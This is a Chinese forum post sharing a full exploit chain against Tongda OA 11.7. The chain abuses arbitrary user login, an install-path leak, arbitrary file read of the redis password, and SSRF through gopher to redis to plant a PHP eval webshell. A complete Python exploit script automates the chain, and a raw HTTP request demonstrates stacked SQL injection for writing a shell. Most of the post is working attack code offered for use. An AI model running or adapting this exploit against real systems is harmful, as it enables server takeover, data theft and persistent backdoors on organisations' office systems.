|
|
原文链接:通达OA11.7 利用新思路(附EXP)
前言
炒个冷饭。都是垃圾小洞组合在一起。
任意用户登陆+获取安装目录+任意文件读取+ssrf-->redis -->写入文件-->getshell
一、 通过任意用户登陆拿到管理员的cookie
二、获取安装目录读取redis 配置文件
三、 ssrf 写入文件
四、getshell
通过任意用户登陆拿到管理员的cookie
通达OA 任意用户登陆条件需要管理员在线
http://192.168.1.22/mobile/auth_ ... p;uid=1&P_VER=0
访问路径,覆盖了session直接用cookie登陆,访问目录/general/进入后台
 
这里已经登陆了。打开无痕模式
如果他什么都没有返回,说明是OK的。那么就利用当前的phpsessid进行访问
如果出现RELOGIN那说明。管理员不在线漏洞形成的过程
这里查询了UID 是否在线。CLIENT 默认为0 这个0代表浏览器
这个表存的是当前用户的登陆信息。UID 和时间。sid 是phpssion 的值。然后client 是客户端标识符。
获取安装目录读取redis 配置文件
/general/approve_center/archive/getTableStruc.php
首先是任意文件读取
/ispirit/im/photo.php?AVATAR_FILE=D:/MYOA/bin/redis.windows.conf&UID=2
读取到redis 密码。然后通过ssrf
/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=gopher://127.0.0.1:6399/
完整exp
如下:
- # -*- coding:utf-8 -*-
- import os
- import requests
- import re
- # author :print("")
- import urllib
- class GenerateUrl:
- def __init__(self, password, webroot, filename):
- self.password = password
- self.webroot = webroot
- self.filename = filename
- self.webshell = '''
-
- <?php file_put_contents('11.php',base64_decode('PD9waHAgQGV2YWwoJF9HRVRbMV0pPz4='))?>
- '''
- self.template = '''_*2
- $4
- AUTH
- ${password_len}
- {password}
- *1
- $8
- flushall
- *4
- $6
- CONFIG
- $3
- SET
- $10
- dbfilename
- ${filename_len}
- {filename}
- *4
- $6
- CONFIG
- $3
- SET
- $3
- dir
- ${webroot_len}
- {webroot}
- *3
- $3
- SET
- $1
- 1
- ${content_len}
- {content}
- *1
- $4
- save
- *1
- $4
- quit
- '''
- def __str__(self):
- webshell = self.webshell
- webshell = webshell.replace('"', '%22').replace("'", '%27').replace(",", "%2c")
- webshell = webshell.replace(' ', '%20').replace('\n', '%0D%0A').replace('<', '%3c').replace('?', '%3f').replace(
- '>', '%3e')
- self.template = self.template.replace("{password_len}", str(len(self.password)))
- self.template = self.template.replace("{password}", self.password)
- self.template = self.template.replace("{filename_len}", str(len(self.filename)))
- self.template = self.template.replace("{filename}", self.filename)
- self.template = self.template.replace("{webroot_len}", str(len(self.webroot)))
- self.template = self.template.replace("{webroot}", self.webroot)
- self.template = self.template.replace("{content_len}", str(len(self.webshell)))
- self.template = self.template.replace("{content}", webshell)
- self.template = self.template.replace('\n', '%0D%0A')
- return urllib.quote_plus(self.template)
- proxies = {
- "http": "http://127.0.0.1:8080",
- "https": "http://127.0.0.1:8080",
- }
- def headers(phpsesion):
- return {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.6) ",
- "Cookie": phpsesion
- }
- # 获取绝对目录
- def get_path(url, headers):
- urlc = url
- url = (url + '/general/approve_center/archive/getTableStruc.php')
- try:
- data = requests.get(url=url, headers=headers, proxies=proxies).json()
- path = data['logPath'].split('\\')[0]
- url2 = urlc + '/ispirit/im/photo.php?AVATAR_FILE=%s/bin/redis.windows.conf&UID=2' % path
- data2 = requests.get(url=url2, headers=headers, proxies=proxies)
- ress = re.search('requirepass .+', data2.text).group()
- return {"path": path, "redis_pass": ress.replace('requirepass ', '').strip()}
- except:
- exit('ERROR Cookie PHPSESSID expired')
- # ssrf写入文件
- def ssrf_webshell(url, path, password):
- urlc = url
- path = path
- password = password
- a = GenerateUrl(password, path + "/webroot/", "666.php")
- url = url + '/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=%s' % ('gopher://127.0.0.1:6399/' + str(a))
- data = requests.get(url=url, headers=headers, proxies=proxies)
- ddd = requests.get(url=urlc + '/666.php')
- if ddd.status_code == 200:
- print('shell url:%s' % urlc + '/666.php')
- else:
- print('send shell ERROR')
- return True
- def get_cookie(url):
- url = url+ "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0"
- headers = {
- "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
- }
- try:
- response = requests.get(url=url, headers=headers)
- if "RELOGIN" in response.text and response.status_code == 200:
- exit("目标用户为离线状态")
- elif response.status_code == 200 and response.text == "":
- print("好了马上就能getshell了")
- cookies = response.cookies
- cookie = requests.utils.dict_from_cookiejar(cookies)
- if cookie['SESSIONID']:
- return cookie['SESSIONID']
- else:
- exit('实在抱歉,getshell不了')
- else:
- print("未知错误,目标可能不存在或不存在该漏洞")
- except Exception as e:
- exit('实在抱歉,getshell不了')
- if __name__ == '__main__':
- import sys
- try:
- url = sys.argv[1]
- cookie =get_cookie(url)
- headers = headers(cookie)
- root_path = get_path(url, headers)
- ssrf_webshell(url, root_path['path'], root_path['redis_pass'])
- except:
- print('python tongda.py http://127.0.0.1')
没有测试那个获取cookie 那个地方。这个需要如果测试中出现意外改改吧。纯演示思路
分享一个后台SQL 注入的点 这里支持堆叠注入。首先需要获取到通达OA的安装目录。然后into 写入shell 即可。=。= - POST /general/appbuilder/web/officeproduct/productapply/applyprobygroup HTTP/1.1
- Host:
- 10.211.55.5
- Content-Length: 39
- Accept: */*
- DNT: 1
- X-Requested-With: XMLHttpRequest
- UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.103 Safar
- i/537.36
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- Origin:
- http://10.211.55.5
- Referer:
- http://10.211.55.5/general/officeProduct/product_apply/index.php
- Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
- Cookie: SID_12=530bf0a5; SID_27=7202df24; USER_NAME_COOKIE=admin; OA_USER_ID=admin; PHPSESSID=1plu8qbupnesf40l9d02fdlvm5
- ; SID_1=24205621
- Connection: close
- arr[5][pro_id]=151';select sleep(3) %23
|
|
发表于 2021-3-6 09:11:55